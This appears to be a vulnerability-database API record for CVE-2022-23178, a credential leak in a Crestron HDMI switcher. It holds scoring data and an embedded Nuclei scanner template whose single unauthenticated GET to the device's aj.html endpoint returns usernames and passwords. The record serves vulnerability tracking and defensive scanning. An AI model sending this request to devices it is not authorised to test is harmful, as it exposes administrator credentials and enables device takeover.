{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2022-23178/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2022-23178/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2022-23178/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2022-23178/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2022-23178/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2022-23178"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2022-23178"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.75159,
      "kev": false,
      "percentile": 0.99488
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2022/CVE-2022-23178.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2022-23178\n\ninfo:\n  name: Crestron Device - Credentials Disclosure\n  author: gy741\n  severity: critical\n  description: An issue was discovered on Crestron HD-MD4X2-4K-E 1.0.0.2159 devices. When the administrative web interface of the HDMI switcher is accessed unauthenticated, user credentials are disclosed that are valid to authenticate to the web interface. Specifically, aj.html sends a JSON document with uname and upassword fields.\n  impact: |\n    An attacker can obtain sensitive credentials, leading to unauthorized access and potential compromise of the device.\n  remediation: |\n    Update the Crestron Device firmware to the latest version to mitigate the vulnerability.\n  reference:\n    - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-009/-credential-disclosure-in-web-interface-of-crestron-device\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-23178\n    - https://de.crestron.com/Products/Video/HDMI-Solutions/HDMI-Switchers/HD-MD4X2-4K-E\n    - https://www.redteam-pentesting.de/advisories/rt-sa-2021-009\n    - https://github.com/Threekiii/Awesome-POC\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2022-23178\n    cwe-id: CWE-287\n    epss-score: 0.75159\n    epss-percentile: 0.99487\n    cpe: cpe:2.3:o:crestron:hd-md4x2-4k-e_firmware:1.0.0.2159:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: crestron\n    product: hd-md4x2-4k-e_firmware\n  tags: cve,cve2022,crestron,disclosure,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/aj.html?a=devi\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"uname\":'\n          - '\"upassword\":'\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022010a921d619600ddb663b0d99d1c100d12c6ceac8a1797ce1ff5daa087e4b7a6c022100aeda0711089ae4b16a48d6da7ff5d4ca69ed4644eb705e857b750bc0d9c38f74:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2022-23178"
}